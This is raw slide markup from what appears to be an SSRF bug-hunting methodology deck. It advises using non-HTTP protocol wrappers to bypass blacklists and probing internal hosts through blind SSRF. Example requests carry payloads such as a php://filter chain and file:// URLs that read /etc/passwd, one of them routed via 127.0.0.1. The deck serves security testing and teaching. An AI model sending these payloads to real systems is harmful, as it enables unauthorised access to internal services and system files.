                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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754" name="Google Shape;754;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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5" name="Google Shape;755;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="756" name="Google Shape;756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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Google Shape;757;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="31284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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="758" name="Google Shape;758;p8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3475" y="2675525"/>
            <a:ext cx="462101" cy="365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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="762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82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use Protocol Wrappers Other Than Http OR HTTPS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SFTP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> POP3 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IMAP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DICT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> GOPHER </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sftp://me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Google Shape;764;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sftp://me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Google Shape;765;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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766" name="Google Shape;766;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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7" name="Google Shape;767;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="768" name="Google Shape;768;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="118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9" name="Google Shape;769;p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4025" y="2675525"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770" name="Google Shape;770;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="774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83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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776" name="Google Shape;776;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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7" name="Google Shape;777;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use This Payload</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="778" name="Google Shape;778;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779" name="Google Shape;779;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php://filter/convert.iconv.WINDOWS-936%2FCP1388|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.iconv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="31284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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="781" name="Google Shape;781;p8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3475" y="2675525"/>
            <a:ext cx="462101" cy="365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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="785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84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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787" name="Google Shape;787;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;788;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="789" name="Google Shape;789;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php://filter/convert.iconv.WINDOWS-936%2FCP1388|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.iconv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=file:///etc/passwd%20#[]@%20127.0.0.1:1337/index.php?url=file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="31284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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="792" name="Google Shape;792;p8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3475" y="2675525"/>
            <a:ext cx="462101" cy="365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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="796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85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If You Got Blind SSRF Over HTTP OR HTTPS , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unresolvable</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Subdomains</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Because There Are </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reachable Subdomains Over Only VPN</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Google Shape;798;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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799" name="Google Shape;799;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0" name="Google Shape;800;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="801" name="Google Shape;801;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802" name="Google Shape;802;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="803" name="Google Shape;803;p8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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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4" name="Google Shape;804;p8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36000" y="2675525"/>
            <a:ext cx="4973700" cy="207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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="808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86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If You Got Blind SSRF Over HTTP OR HTTPS , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Request An Internal URL That</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Performs Another SSRF That Calls Out To Your Domain e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache Solr Is Running </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internally</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="0B5394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t/>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
